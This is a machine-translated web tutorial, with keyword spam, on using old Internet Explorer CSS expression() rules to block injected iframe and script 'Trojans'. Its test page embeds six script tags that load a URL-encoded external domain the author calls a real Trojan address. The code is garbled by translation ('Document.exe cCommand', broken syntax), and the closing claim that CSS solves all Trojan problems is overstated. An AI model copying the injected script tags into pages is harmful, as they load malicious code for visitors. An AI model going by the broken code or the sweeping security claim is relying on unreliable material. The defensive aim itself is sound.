Webpage Trojan clear webpage Trojan

Anti-Trojan techniques webpage Trojan generator webpage Trojan creation webpage Trojan tutorial webpage Trojan creation tutorial webpage Trojan scan webpage Trojan download webpage Trojan code clear webpage Trojan

 

Solution 1:

Iframe {n1ifm: expression (this. src = 'about: blank ', this. outerHTML = '');}/* this line of code solves the problem of hanging IFRAME Trojans */
Script {nojs1: expression (this. src. toLowerCase (). indexOf ('http') = 0 )? Document. write ('Trojan is isolated successfully! '):'');}
 

Principle: convert the <script>-marked src file to lowercase, and check whether it is an external domain JS script file starting with "http". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.

Disadvantage: The visitor cannot see the page infected with the <script> Trojan.

Solution 2:

Iframe {nifm2: expression (this. src = 'about: blank ', this. outerHTML = '');}
Script {no2js: expression (this. src. toLowerCase (). indexOf ('http') = 0 )? Document. close ():'');}
Webpage Tutorial network

Principle: force disable document. write () of JS files in external domains using document. close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.

Solution 3:

Iframe {ni3fm: expression (this. src = 'about: blank ', this. outerHTML = '');}
Script {n3ojs: expression (this. src. toLowerCase (). indexOf ('http') = 0 )? Document.exe cCommand ('stop '):'');}
 

Principle: the same as the JS file to the external domain, immediately call the IE private execCommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just like clicking the "stop" button in the browser. It seems that this is a method for JS to simulate the IE stop button.

 

Solution 4:

Iframe {nif4m: expression (this. src = 'about: blank ', this. outerHTML = '');}
Script {noj4s: expression (if (this. src. indexOf ('http ') = 0) this. src = 'Res: // ieframe. dll/dnserror.htm ');}
Webpage Tutorial network

Principle: overwrite the src of the JS file in the external domain to the address of the IE404 error page. In this way, the JS code in the external domain will not be downloaded.

Solution 5: Webpage Tutorial network

Iframe {nifm5: expression (this. src = 'about: blank ', this. outerHTML = '');}
Script {noj5s: expression (this. id. toLowerCase (). indexOf ('lh ') = 0 )? Document. write ('Trojan is isolated successfully! '):''));}
 

In the fifth solution, you must add an id prefixed with "lh" to the page HTML source code <script>, such as lhWeatherJSapi and <script src = "***/**. js "id =" lhSearchJSapi "> </script>

The code on the following page contains a Trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it! (This test is dangerous. Make sure all patches are installed before testing)

<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = utf-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/css" id = "LinrStudio">
/* <! [CDATA [*/
Iframe {nhk1: expression (this. src = 'about: blank ', this. outerHTML = '');}
Script {ngz1: expression (this. src. indexOf ('http') = 0 )? Document. close ():'');}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<Script type = "text/javascript" src = "1.js"> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = "http: // % 76% 63% 63% 64% 2E % 63% 6E" type = "text/javascript"> </script>

 

<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I am Page 1
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I'm from page 2
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I am 3 of the page itself
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
</Body>
</Html>

Among them, 1. js is on its own site:

Document. write ("I am a JS file on this site ");
Document. write (" ");
 

My test environment is:

Windows XP SP2 and windows Vista SP1
IE6/IE7/IE8
All patches have been installed.

In summary, all the current Trojan-mounting methods have been cracked, and CSS can be used to solve all the Trojan problems, so that visitors will not be easily poisoned.

You should also take a closer look at the bugs in my code. If you have any bugs, you must discuss them to solve the problem! Or you may have another better way to discuss it.